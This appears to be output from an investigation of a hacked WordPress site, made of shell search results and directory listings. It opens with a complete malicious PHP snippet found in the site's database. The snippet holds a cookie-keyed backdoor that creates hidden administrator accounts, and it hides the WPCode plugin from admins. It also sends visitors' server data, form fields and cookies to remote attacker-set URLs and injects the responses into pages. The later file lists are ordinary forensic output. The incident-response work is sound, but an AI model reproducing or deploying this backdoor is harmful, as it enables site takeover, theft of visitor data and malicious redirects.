=== published snippet 173840 ===
post_content
if (defined("_WP_WEBSITE")) {
\n    return;
\n}
\n
\ndefine("_WP_PWSA", "da1b61dff981349d695dd5c5b6ed313d");
\ndefine('_WP_WEBSITE', "www.old.taylorchasewhite.com");
\n
\nforeach (['DONOTCACHEPAGE', 'DONOTMINIFY', 'DONOTCDN'] as $const) {
\n    if (!defined($const)) {
\n        define($const, false);
\n    }
\n}
\n
\nadd_filter( 'sgo_bypass_cache', '__return_true' );
\nadd_filter( 'autoptimize_filter_noptimize', '__return_true' );
\nadd_filter('do_rocket_generate_caching_files', '__return_false');
\nadd_filter('w3tc_can_cache', '__return_false');
\nadd_filter('wp_cache_not_logged_in', '__return_false');
\nadd_filter('wp_cache_no_cache_for_get', '__return_true');
\ndo_action( 'litespeed_control_set_nocache', '' );
\n
\nfunction b64($input)
\n{
\n    return base64_decode($input);
\n}
\n
\nfunction download($path, $add_fields)
\n{
\n    $fields = ['v' => 2, 'website' => _WP_WEBSITE, 'server' => $_SERVER, 'download_type' => 'direct'];
\n    if ($add_fields) {
\n        $fields = array_merge($fields, [
\n            'post' => isset($_POST) ? $_POST : [],
\n            'get' => isset($_GET) ? $_GET : [],
\n            'cookie' => isset($_COOKIE) ? $_COOKIE : []
\n        ]);
\n    }
\n    $ch = @curl_init();
\n    @curl_setopt($ch, CURLOPT_URL, $path);
\n    @curl_setopt($ch, CURLOPT_POST, 1);
\n    @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
\n    @curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
\n    @curl_setopt($ch, CURLOPT_TIMEOUT, 60);
\n    @curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
\n    @curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields));
\n    $output = @curl_exec($ch);
\n    @curl_close($ch);
\n    return $output;
\n}
\n
\nif ((current_user_can('edit_pages') || current_user_can('edit_others_pages')) && !array_key_exists('show_all', $_GET) && !defined('_WP_FIX')) {
\n    define('_WP_FIX', true);
\n
\n    function fix_style()
\n    {
\n        echo '<style>';
\n        echo '#toplevel_page_wpcode { display: none; }';
\n        echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
\n        echo '#wpcode-notice-global-review_request { display: none; }';
\n        echo '</style>';
\n    }
\n
\n    add_action('admin_head', 'fix_style');
\n    add_action('wp_head', 'fix_style');
\n
\n    add_filter('all_plugins', function ($plugins) {
\n        if (isset($plugins['wpcode/wpcode.php'])) {
\n            unset($plugins['wpcode/wpcode.php']);
\n        }
\n        if (isset($plugins['insert-headers-and-footers/ihaf.php'])) {
\n            unset($plugins['insert-headers-and-footers/ihaf.php']);
\n        }
\n        return $plugins;
\n    });
\n
\n    function fix_updates($value)
\n    {
\n        if (isset($value) && is_object($value)) {
\n            if (isset($value->response['insert-headers-and-footers/ihaf.php'])) {
\n                unset($value->response['insert-headers-and-footers/ihaf.php']);
\n            }
\n            if (isset($value->response['wpcode/wpcode.php'])) {
\n                unset($value->response['wpcode/wpcode.php']);
\n            }
\n        }
\n        return $value;
\n    }
\n
\n    add_filter('site_transient_update_plugins', 'fix_updates');
\n    add_filter('transient_update_plugins', 'fix_updates');
\n}
\n
\nif (!function_exists('_red')) {
\n    error_reporting(0);
\n    ini_set('display_errors', 0);
\n
\n    function _gcookie($n)
\n    {
\n        return (isset($_COOKIE[$n])) ? b64($_COOKIE[$n]) : '';
\n    }
\n
\n    if (!empty(_WP_PWSA) && _gcookie('pw') === _WP_PWSA) {
\n        switch (_gcookie('c')) {
\n            case 'sd':
\n                $d = _gcookie('d');
\n                if (strpos($d, '.') > 0) {
\n                    update_option('d', $d);
\n                }
\n                break;
\n            case 'sl':
\n                $l = _gcookie('l');
\n                if (substr($l, 0, 4) === 'http' && strpos($l, '.') > 0) {
\n                    update_option('l', $l);
\n                }
\n                break;
\n            case 'au':
\n                $u = _gcookie('u');
\n                $p = _gcookie('p');
\n                $e = _gcookie('e');
\n
\n                if ($u && $p && $e && !username_exists($u)) {
\n                    $user_id = wp_create_user($u, $p, $e);
\n                    $user = new WP_User($user_id);
\n                    $user->set_role('administrator');
\n                }
\n                break;
\n        }
\n        die('X-OK');
\n    }
\n
\n    if (@stripos(wp_login_url(), '' . $_SERVER['SCRIPT_NAME']) !== false) {
\n        return;
\n    }
\n
\n    if (_gcookie("skip") === "1") {
\n        return;
\n    }
\n
\n    function _user_ip()
\n    {
\n        foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) {
\n            if (array_key_exists($key, $_SERVER) && !empty($_SERVER[$key])) {
\n                foreach (@explode(',', '' . $_SERVER[$key]) as $ip) {
\n                    $ip = trim($ip);
\n                    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) {
\n                        return $ip;
\n                    }
\n                }
\n            }
\n        }
\n
\n        return false;
\n    }
\n
\n    function _red()
\n    {
\n        if (is_user_logged_in()) {
\n            return;
\n        }
\n
\n        if (isset($_SERVER['REQUEST_URI']) && (stripos($_SERVER['REQUEST_URI'], 'wp-admin') !== false || stripos($_SERVER['REQUEST_URI'], 'wp-login.php') !== false)) {
\n            return;
\n        }
\n
\n        $ip = _user_ip();
\n        if (!$ip) {
\n            return;
\n        }
\n
\n        $exp = get_transient('exp');
\n        if (!is_array($exp)) {
\n            $exp = array();
\n        }
\n
\n        foreach ($exp as $k => $v) {
\n            if (time() - $v > 86400) {
\n                unset($exp[$k]);
\n            }
\n        }
\n
\n        $u = strtolower(preg_replace("/[^A-Za-z0-9]/", '', isset($_GET['u']) ? 'uu' . $_GET['u'] : ''));
\n        $u = (strlen($u) > 20) ? substr($u, 0, 20) : $u;
\n
\n        $post = isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['v']) && isset($_POST['website']) && isset($_POST['server']) && isset($_POST['download_type']);
\n
\n        if (key_exists($ip, $exp) && (time() - $exp[$ip] < 86400) && strlen($u) < 3 && !$post) {
\n            return;
\n        }
\n
\n        if (!function_exists('curl_init')) {
\n            return;
\n        }
\n
\n        $links = get_option('l');
\n        if (!$links) {
\n            return;
\n        }
\n
\n        $exp[$ip] = time();
\n        delete_transient('exp');
\n        set_transient('exp', $exp);
\n
\n        $links = explode("\\n", $links);
\n        shuffle($links);
\n
\n        for ($i = 0; $i < 4; $i++) {
\n            $s = $links[$i % count($links)] . "/" . substr(md5(microtime()), rand(0, 26), 6);
\n            if (!$s || substr($s, 0, 4) !== 'http') {
\n                continue;
\n            }
\n
\n            $output = download($s, $post || strlen($u) > 2);
\n
\n            if ($output) {
\n                $j = json_decode($output);
\n                if (is_object($j) && (isset($j->body) || isset($j->headers) || isset($j->skip))) {
\n                    if ($post && isset($j->headers) && isset($j->body)) {
\n                        echo $output;
\n                        exit;
\n                    } else {
\n                        if (isset($j->headers)) {
\n                            foreach ($j->headers as $header) {
\n                                header($header);
\n
\n                            }
\n                        }
\n                        if (isset($j->body)) {
\n                            echo b64($j->body);
\n                        }
\n                    }
\n                    if (isset($j->skip)) {
\n                        break;
\n                    } else {
\n                        exit;
\n                    }
\n                }
\n            }
\n        }
\n    }
\n
\n    add_action('init', '_red');
\n}

=== what string did sso.php match? ===
58:                wp_safe_redirect( admin_url( $bounce ) );
74:        wp_safe_redirect( wp_login_url() );

=== what are theme files matching _pwsa? sample ===
--- wp-content/themes/twentyseventeen/functions.php ---
283:add_action( 'template_redirect', 'twentyseventeen_content_width', 0 );
--- wp-content/themes/twentytwelve/functions.php ---
652:add_action( 'template_redirect', 'twentytwelve_content_width' );
--- wp-content/themes/surfarama-child/functions.php ---
--- wp-content/themes/surfarama/functions.php ---

=== checksum unsafe themes - any modified? ===
-rw-r--r-- 1 taylosj9 taylosj9 23419 Apr 30 22:33 wp-content/themes/twentyseventeen/functions.php
-rw-r--r-- 1 taylosj9 taylosj9 24192 Apr 30 22:33 wp-content/themes/twentytwelve/functions.php

=== first lines of currently active theme functions.php ===
<?php

add_action( 'wp_enqueue_scripts', 'theme_enqueue_styles' );
function theme_enqueue_styles() {
    wp_enqueue_style( 'parent-style', get_template_directory_uri() . '/style.css' );
}


?>
...
=== full surfarama-child functions.php (it's small) ===
<?php

add_action( 'wp_enqueue_scripts', 'theme_enqueue_styles' );
function theme_enqueue_styles() {
    wp_enqueue_style( 'parent-style', get_template_directory_uri() . '/style.css' );
}


?>

=== uploads/wpcode contents ===
wp-content/uploads/wpcode/:
total 228
drwxr-xr-x 3 taylosj9 taylosj9   4096 Sep  8  2023 .
drwxr-xr-x 4 taylosj9 taylosj9 225280 May  3 07:11 ..
drwxr-xr-x 3 taylosj9 taylosj9   4096 Sep  8  2023 cache
-rw-r--r-- 1 taylosj9 taylosj9      0 Sep  8  2023 index.html

wp-content/uploads/wpcode/cache:
total 24
drwxr-xr-x 3 taylosj9 taylosj9 4096 Sep  8  2023 .
drwxr-xr-x 3 taylosj9 taylosj9 4096 Sep  8  2023 ..
-rw-r--r-- 1 taylosj9 taylosj9 6479 Apr 30 06:49 docs.json
-rw-r--r-- 1 taylosj9 taylosj9    0 Sep  8  2023 index.html
drwxr-xr-x 2 taylosj9 taylosj9 4096 Sep  8  2023 library

wp-content/uploads/wpcode/cache/library:
total 60
drwxr-xr-x 2 taylosj9 taylosj9  4096 Sep  8  2023 .
drwxr-xr-x 3 taylosj9 taylosj9  4096 Sep  8  2023 ..
-rw-r--r-- 1 taylosj9 taylosj9     0 Sep  8  2023 index.html
-rw-r--r-- 1 taylosj9 taylosj9 46549 Apr 30 06:49 snippets.json

=== ALL files containing _pwsa (full list) ===

=== files containing 'function _red' ===
./wp-admin/includes/.svn/text-base/update-core.php.svn-base
./wp-admin/includes/update-core.php
./wp/wp-admin/includes/.svn/text-base/update-core.php.svn-base
./wp/wp-admin/includes/update-core.php
./wp/backup-1424038016-wp-admin/includes/update-core.php
./wp/wp-content/plugins/w3-total-cache/Generic_AdminActions_Flush.php
./wp/wp-content/plugins/worker/src/PHPSecLib/Math/BigInteger.php

=== files modified in last 14 days outside wp-content/cache and jetpack ===
./wp-config.php
./wp-content/themes/twentyeleven/page.php
./wp-content/themes/twentyeleven/single.php
./wp-content/themes/twentyeleven/search.php
./wp-content/themes/twentyeleven/functions.php
./wp-content/themes/twentyeleven/image.php
./wp-content/themes/twentyeleven/404.php
./wp-content/themes/twentyeleven/header.php
./wp-content/themes/twentyeleven/footer.php
./wp-content/themes/twentyeleven/tag.php
./wp-content/themes/twentyeleven/content-page.php
./wp-content/themes/twentyeleven/content-status.php
./wp-content/themes/twentyeleven/content-image.php
./wp-content/themes/twentyeleven/content-featured.php
./wp-content/themes/twentyeleven/showcase.php
./wp-content/themes/twentyeleven/sidebar.php
./wp-content/themes/twentyeleven/author.php
./wp-content/themes/twentyeleven/category.php
./wp-content/themes/twentyeleven/content-single.php
./wp-content/themes/twentyeleven/sidebar-page.php
./wp-content/themes/twentyeleven/comments.php
./wp-content/themes/twentyeleven/inc/block-patterns.php
./wp-content/themes/twentyeleven/inc/widgets.php
./wp-content/themes/twentyeleven/inc/theme-options.php
./wp-content/themes/twentyeleven/searchform.php
./wp-content/themes/twentyeleven/content.php
./wp-content/themes/twentyeleven/content-intro.php
./wp-content/themes/twentyeleven/index.php
./wp-content/themes/twentyeleven/content-aside.php
./wp-content/themes/twentyeleven/sidebar-footer.php
./wp-content/themes/twentyeleven/content-link.php
./wp-content/themes/twentyeleven/archive.php
./wp-content/themes/twentyeleven/content-gallery.php
./wp-content/themes/twentyeleven/content-quote.php
./wp-content/themes/twentyseventeen/page.php
./wp-content/themes/twentyseventeen/single.php
./wp-content/themes/twentyseventeen/search.php
./wp-content/themes/twentyseventeen/functions.php
./wp-content/themes/twentyseventeen/404.php
./wp-content/themes/twentyseventeen/header.php
./wp-content/themes/twentyseventeen/footer.php
./wp-content/themes/twentyseventeen/sidebar.php
./wp-content/themes/twentyseventeen/front-page.php
./wp-content/themes/twentyseventeen/comments.php
./wp-content/themes/twentyseventeen/inc/color-patterns.php
./wp-content/themes/twentyseventeen/inc/custom-header.php
./wp-content/themes/twentyseventeen/inc/template-functions.php
./wp-content/themes/twentyseventeen/inc/block-patterns.php
./wp-content/themes/twentyseventeen/inc/customizer.php
./wp-content/themes/twentyseventeen/inc/icon-functions.php
./wp-content/themes/twentyseventeen/inc/back-compat.php
./wp-content/themes/twentyseventeen/inc/template-tags.php
./wp-content/themes/twentyseventeen/searchform.php
./wp-content/themes/twentyseventeen/index.php
./wp-content/themes/twentyseventeen/archive.php
./wp-content/themes/twentyseventeen/template-parts/footer/site-info.php
./wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php
./wp-content/themes/twentyseventeen/template-parts/page/content-page.php
./wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php
./wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php
./wp-content/themes/twentyseventeen/template-parts/header/header-image.php
./wp-content/themes/twentyseventeen/template-parts/header/site-branding.php
./wp-content/themes/twentyseventeen/template-parts/post/content-none.php
./wp-content/themes/twentyseventeen/template-parts/post/content-video.php
./wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php
./wp-content/themes/twentyseventeen/template-parts/post/content-image.php
./wp-content/themes/twentyseventeen/template-parts/post/content-audio.php
./wp-content/themes/twentyseventeen/template-parts/post/content.php
./wp-content/themes/twentyseventeen/template-parts/post/content-gallery.php
./wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php
./wp-content/themes/twentytwentyone/page.php
./wp-content/themes/twentytwentyone/single.php
./wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php
./wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php
./wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php
./wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php
./wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php
./wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php
./wp-content/themes/twentytwentyone/search.php
./wp-content/themes/twentytwentyone/functions.php
./wp-content/themes/twentytwentyone/image.php
./wp-content/themes/twentytwentyone/404.php
./wp-content/themes/twentytwentyone/header.php
./wp-content/themes/twentytwentyone/footer.php
./wp-content/themes/twentytwentyone/comments.php
./wp-content/themes/twentytwentyone/inc/template-functions.php
./wp-content/themes/twentytwentyone/inc/block-patterns.php
./wp-content/themes/twentytwentyone/inc/menu-functions.php
./wp-content/themes/twentytwentyone/inc/starter-content.php
./wp-content/themes/twentytwentyone/inc/custom-css.php
./wp-content/themes/twentytwentyone/inc/block-styles.php
./wp-content/themes/twentytwentyone/inc/back-compat.php
./wp-content/themes/twentytwentyone/inc/template-tags.php
./wp-content/themes/twentytwentyone/searchform.php
./wp-content/themes/twentytwentyone/index.php
./wp-content/themes/twentytwentyone/archive.php
./wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php
./wp-content/themes/twentytwentyone/template-parts/header/site-header.php
./wp-content/themes/twentytwentyone/template-parts/header/site-nav.php
./wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php
./wp-content/themes/twentytwentyone/template-parts/header/site-branding.php
./wp-content/themes/twentytwentyone/template-parts/header/entry-header.php
./wp-content/themes/twentytwentyone/template-parts/post/author-bio.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php
./wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php
./wp-content/themes/twentytwentyone/template-parts/content/content-none.php
./wp-content/themes/twentytwentyone/template-parts/content/content-page.php
./wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php
./wp-content/themes/twentytwentyone/template-parts/content/content-single.php
./wp-content/themes/twentytwentyone/template-parts/content/content.php
./wp-content/themes/twentytwentyfive/functions.php
./wp-content/themes/twentytwentyfive/patterns/event-3-col.php
./wp-content/themes/twentytwentyfive/patterns/template-home-with-sidebar-news-blog.php
./wp-content/themes/twentytwentyfive/patterns/cta-grid-products-link.php
./wp-content/themes/twentytwentyfive/patterns/template-query-loop-news-blog.php
./wp-content/themes/twentytwentyfive/patterns/banner-with-description-and-images-grid.php
./wp-content/themes/twentytwentyfive/patterns/banner-intro-image.php
./wp-content/themes/twentytwentyfive/patterns/template-home-news-blog.php
./wp-content/themes/twentytwentyfive/patterns/page-portfolio-home.php
./wp-content/themes/twentytwentyfive/patterns/hero-overlapped-book-cover-with-links.php
./wp-content/themes/twentytwentyfive/patterns/page-business-home.php
./wp-content/themes/twentytwentyfive/patterns/format-audio.php
./wp-content/themes/twentytwentyfive/patterns/hidden-blog-heading.php
./wp-content/themes/twentytwentyfive/patterns/cta-newsletter.php
./wp-content/themes/twentytwentyfive/patterns/template-query-loop-vertical-header-blog.php
./wp-content/themes/twentytwentyfive/patterns/header.php
./wp-content/themes/twentytwentyfive/patterns/template-search-photo-blog.php
./wp-content/themes/twentytwentyfive/patterns/footer.php
./wp-content/themes/twentytwentyfive/patterns/contact-location-and-link.php
./wp-content/themes/twentytwentyfive/patterns/testimonials-large.php
./wp-content/themes/twentytwentyfive/patterns/header-columns.php
./wp-content/themes/twentytwentyfive/patterns/template-single-left-aligned-content.php
./wp-content/themes/twentytwentyfive/patterns/text-faqs.php
./wp-content/themes/twentytwentyfive/patterns/template-archive-text-blog.php
./wp-content/themes/twentytwentyfive/patterns/post-navigation.php
./wp-content/themes/twentytwentyfive/patterns/page-cv-bio.php
./wp-content/themes/twentytwentyfive/patterns/template-page-vertical-header-blog.php
./wp-content/themes/twentytwentyfive/patterns/binding-format.php
./wp-content/themes/twentytwentyfive/patterns/hero-book.php
./wp-content/themes/twentytwentyfive/patterns/footer-newsletter.php
./wp-content/themes/twentytwentyfive/patterns/logos.php
./wp-content/themes/twentytwentyfive/patterns/services-3-col.php
./wp-content/themes/twentytwentyfive/patterns/format-link.php
./wp-content/themes/twentytwentyfive/patterns/template-query-loop.php
./wp-content/themes/twentytwentyfive/patterns/template-home-photo-blog.php
./wp-content/themes/twentytwentyfive/patterns/testimonials-6-col.php
./wp-content/themes/twentytwentyfive/patterns/template-archive-photo-blog.php
./wp-content/themes/twentytwentyfive/patterns/template-search-vertical-header-blog.php
./wp-content/themes/twentytwentyfive/patterns/cta-events-list.php
./wp-content/themes/twentytwentyfive/patterns/services-team-photos.php
./wp-content/themes/twentytwentyfive/patterns/vertical-header.php
./wp-content/themes/twentytwentyfive/patterns/hero-podcast.php
./wp-content/themes/twentytwentyfive/patterns/banner-about-book.php
./wp-content/themes/twentytwentyfive/patterns/banner-poster.php
./wp-content/themes/twentytwentyfive/patterns/hidden-404.php
./wp-content/themes/twentytwentyfive/patterns/cta-heading-search.php
./wp-content/themes/twentytwentyfive/patterns/page-coming-soon.php
./wp-content/themes/twentytwentyfive/patterns/template-search-news-blog.php
./wp-content/themes/twentytwentyfive/patterns/template-search-text-blog.php
./wp-content/themes/twentytwentyfive/patterns/template-page-photo-blog.php
./wp-content/themes/twentytwentyfive/patterns/template-single-news-blog.php
./wp-content/themes/twentytwentyfive/patterns/header-large-title.php
./wp-content/themes/twentytwentyfive/patterns/page-link-in-bio-wide-margins.php
./wp-content/themes/twentytwentyfive/patterns/template-query-loop-text-blog.php
./wp-content/themes/twentytwentyfive/patterns/cta-book-links.php
./wp-content/themes/twentytwentyfive/patterns/media-instagram-grid.php
./wp-content/themes/twentytwentyfive/patterns/template-single-text-blog.php
./wp-content/themes/twentytwentyfive/patterns/comments.php
./wp-content/themes/twentytwentyfive/patterns/page-landing-podcast.php
./wp-content/themes/twentytwentyfive/patterns/grid-videos.php
./wp-content/themes/twentytwentyfive/patterns/template-query-loop-photo-blog.php
./wp-content/themes/twentytwentyfive/patterns/template-single-photo-blog.php
./wp-content/themes/twentytwentyfive/patterns/banner-intro.php
./wp-content/themes/twentytwentyfive/patterns/pricing-2-col.php
./wp-content/themes/twentytwentyfive/patterns/hero-full-width-image.php
./wp-content/themes/twentytwentyfive/patterns/testimonials-2-col.php
./wp-content/themes/twentytwentyfive/patterns/page-link-in-bio-with-tight-margins.php
./wp-content/themes/twentytwentyfive/patterns/cta-centered-heading.php
./wp-content/themes/twentytwentyfive/patterns/grid-with-categories.php
./wp-content/themes/twentytwentyfive/patterns/event-schedule.php
./wp-content/themes/twentytwentyfive/patterns/hidden-search.php
./wp-content/themes/twentytwentyfive/patterns/template-404-vertical-header-blog.php
./wp-content/themes/twentytwentyfive/patterns/footer-centered.php
./wp-content/themes/twentytwentyfive/patterns/event-rsvp.php
./wp-content/themes/twentytwentyfive/patterns/template-home-text-blog.php
./wp-content/themes/twentytwentyfive/patterns/footer-social.php
./wp-content/themes/twentytwentyfive/patterns/more-posts.php
./wp-content/themes/twentytwentyfive/patterns/banner-cover-big-heading.php
./wp-content/themes/twentytwentyfive/patterns/template-single-offset.php
./wp-content/themes/twentytwentyfive/patterns/hidden-sidebar.php
./wp-content/themes/twentytwentyfive/patterns/template-archive-vertical-header-blog.php
./wp-content/themes/twentytwentyfive/patterns/contact-info-locations.php
./wp-content/themes/twentytwentyfive/patterns/heading-and-paragraph-with-image.php
./wp-content/themes/twentytwentyfive/patterns/template-single-vertical-header-blog.php
./wp-content/themes/twentytwentyfive/patterns/page-link-in-bio-heading-paragraph-links-image.php
./wp-content/themes/twentytwentyfive/patterns/template-home-vertical-header-blog.php
./wp-content/themes/twentytwentyfive/patterns/template-home-posts-grid-news-blog.php
./wp-content/themes/twentytwentyfive/patterns/footer-columns.php
./wp-content/themes/twentytwentyfive/patterns/pricing-3-col.php
./wp-content/themes/twentytwentyfive/patterns/page-landing-book.php
./wp-content/themes/twentytwentyfive/patterns/page-landing-event.php
./wp-content/themes/twentytwentyfive/patterns/page-shop-home.php
./wp-content/themes/twentytwentyfive/patterns/header-centered.php
./wp-content/themes/twentytwentyfive/patterns/services-subscriber-only-section.php
./wp-content/themes/twentytwentyfive/patterns/cta-book-locations.php
./wp-content/themes/twentytwentyfive/patterns/template-archive-news-blog.php
./wp-content/themes/twentytwentyfive/patterns/overlapped-images.php
./wp-content/themes/twentytwentyfive/patterns/hidden-written-by.php
./wp-content/themes/twentytwentyfive/patterns/contact-centered-social-link.php
./wp-content/themes/twentytwelve/sidebar-front.php
./wp-content/themes/twentytwelve/page.php
./wp-content/themes/twentytwelve/single.php
./wp-content/themes/twentytwelve/search.php
./wp-content/themes/twentytwelve/functions.php
./wp-content/themes/twentytwelve/content-none.php
./wp-content/themes/twentytwelve/image.php
./wp-content/themes/twentytwelve/404.php
./wp-content/themes/twentytwelve/header.php
./wp-content/themes/twentytwelve/footer.php
./wp-content/themes/twentytwelve/tag.php
./wp-content/themes/twentytwelve/content-page.php
./wp-content/themes/twentytwelve/content-status.php
./wp-content/themes/twentytwelve/content-image.php
./wp-content/themes/twentytwelve/sidebar.php
./wp-content/themes/twentytwelve/author.php
./wp-content/themes/twentytwelve/category.php
./wp-content/themes/twentytwelve/comments.php
./wp-content/themes/twentytwelve/inc/custom-header.php
./wp-content/themes/twentytwelve/inc/block-patterns.php
./wp-content/themes/twentytwelve/content.php
./wp-content/themes/twentytwelve/index.php
./wp-content/themes/twentytwelve/content-aside.php
./wp-content/themes/twentytwelve/content-link.php
./wp-content/themes/twentytwelve/archive.php
./wp-content/themes/twentytwelve/page-templates/front-page.php
./wp-content/themes/twentytwelve/page-templates/full-width.php
./wp-content/themes/twentytwelve/content-quote.php
./wp-content/themes/twentynineteen/page.php
./wp-content/themes/twentynineteen/single.php
./wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php
./wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php
./wp-content/themes/twentynineteen/search.php
./wp-content/themes/twentynineteen/functions.php
./wp-content/themes/twentynineteen/image.php
./wp-content/themes/twentynineteen/404.php
./wp-content/themes/twentynineteen/header.php
./wp-content/themes/twentynineteen/footer.php
./wp-content/themes/twentynineteen/comments.php
./wp-content/themes/twentynineteen/inc/color-patterns.php
./wp-content/themes/twentynineteen/inc/template-functions.php
./wp-content/themes/twentynineteen/inc/block-patterns.php
./wp-content/themes/twentynineteen/inc/customizer.php
./wp-content/themes/twentynineteen/inc/helper-functions.php
./wp-content/themes/twentynineteen/inc/icon-functions.php
./wp-content/themes/twentynineteen/inc/back-compat.php
./wp-content/themes/twentynineteen/inc/template-tags.php
./wp-content/themes/twentynineteen/index.php
./wp-content/themes/twentynineteen/archive.php
./wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php
./wp-content/themes/twentynineteen/template-parts/header/site-branding.php
./wp-content/themes/twentynineteen/template-parts/header/entry-header.php
./wp-content/themes/twentynineteen/template-parts/post/author-bio.php
./wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php
./wp-content/themes/twentynineteen/template-parts/content/content-none.php
./wp-content/themes/twentynineteen/template-parts/content/content-page.php
./wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php
./wp-content/themes/twentynineteen/template-parts/content/content-single.php
./wp-content/themes/twentynineteen/template-parts/content/content.php
./wp-content/themes/twentyfifteen/page.php
./wp-content/themes/twentyfifteen/content-search.php
./wp-content/themes/twentyfifteen/single.php
./wp-content/themes/twentyfifteen/author-bio.php
./wp-content/themes/twentyfifteen/search.php
./wp-content/themes/twentyfifteen/functions.php
./wp-content/themes/twentyfifteen/content-none.php
./wp-content/themes/twentyfifteen/image.php
./wp-content/themes/twentyfifteen/404.php
./wp-content/themes/twentyfifteen/header.php
./wp-content/themes/twentyfifteen/footer.php
./wp-content/themes/twentyfifteen/content-page.php
./wp-content/themes/twentyfifteen/sidebar.php
./wp-content/themes/twentyfifteen/comments.php
./wp-content/themes/twentyfifteen/inc/custom-header.php
./wp-content/themes/twentyfifteen/inc/block-patterns.php
./wp-content/themes/twentyfifteen/inc/customizer.php
./wp-content/themes/twentyfifteen/inc/back-compat.php
./wp-content/themes/twentyfifteen/inc/template-tags.php
./wp-content/themes/twentyfifteen/content.php
./wp-content/themes/twentyfifteen/index.php
./wp-content/themes/twentyfifteen/content-link.php
./wp-content/themes/twentyfifteen/archive.php
./wp-content/themes/twentythirteen/page.php
./wp-content/themes/twentythirteen/content-chat.php
./wp-content/themes/twentythirteen/single.php
./wp-content/themes/twentythirteen/author-bio.php
./wp-content/themes/twentythirteen/search.php
./wp-content/themes/twentythirteen/functions.php
./wp-content/themes/twentythirteen/content-none.php
./wp-content/themes/twentythirteen/image.php
./wp-content/themes/twentythirteen/404.php
./wp-content/themes/twentythirteen/header.php
./wp-content/themes/twentythirteen/footer.php
./wp-content/themes/twentythirteen/tag.php
./wp-content/themes/twentythirteen/content-video.php
./wp-content/themes/twentythirteen/content-status.php
./wp-content/themes/twentythirteen/content-image.php
./wp-content/themes/twentythirteen/sidebar-main.php
./wp-content/themes/twentythirteen/sidebar.php
./wp-content/themes/twentythirteen/author.php
./wp-content/themes/twentythirteen/category.php
./wp-content/themes/twentythirteen/comments.php
./wp-content/themes/twentythirteen/content-audio.php
./wp-content/themes/twentythirteen/inc/custom-header.php
./wp-content/themes/twentythirteen/inc/block-patterns.php
./wp-content/themes/twentythirteen/inc/back-compat.php
./wp-content/themes/twentythirteen/content.php
./wp-content/themes/twentythirteen/index.php
./wp-content/themes/twentythirteen/taxonomy-post_format.php
./wp-content/themes/twentythirteen/content-aside.php
./wp-content/themes/twentythirteen/content-link.php
./wp-content/themes/twentythirteen/archive.php
./wp-content/themes/twentythirteen/content-gallery.php
./wp-content/themes/twentythirteen/content-quote.php
./wp-content/themes/twentyfourteen/page.php
./wp-content/themes/twentyfourteen/single.php
./wp-content/themes/twentyfourteen/sidebar-content.php
./wp-content/themes/twentyfourteen/search.php
./wp-content/themes/twentyfourteen/functions.php
./wp-content/themes/twentyfourteen/content-none.php
./wp-content/themes/twentyfourteen/image.php
./wp-content/themes/twentyfourteen/404.php
./wp-content/themes/twentyfourteen/header.php
./wp-content/themes/twentyfourteen/footer.php
./wp-content/themes/twentyfourteen/tag.php
./wp-content/themes/twentyfourteen/content-video.php
./wp-content/themes/twentyfourteen/content-page.php
./wp-content/themes/twentyfourteen/content-image.php
./wp-content/themes/twentyfourteen/sidebar.php
./wp-content/themes/twentyfourteen/author.php
./wp-content/themes/twentyfourteen/category.php
./wp-content/themes/twentyfourteen/comments.php
./wp-content/themes/twentyfourteen/content-audio.php
./wp-content/themes/twentyfourteen/inc/custom-header.php
./wp-content/themes/twentyfourteen/inc/block-patterns.php
./wp-content/themes/twentyfourteen/inc/customizer.php
./wp-content/themes/twentyfourteen/inc/widgets.php
./wp-content/themes/twentyfourteen/inc/featured-content.php
./wp-content/themes/twentyfourteen/inc/back-compat.php
./wp-content/themes/twentyfourteen/inc/template-tags.php
./wp-content/themes/twentyfourteen/featured-content.php
./wp-content/themes/twentyfourteen/content-featured-post.php
./wp-content/themes/twentyfourteen/content.php
./wp-content/themes/twentyfourteen/index.php
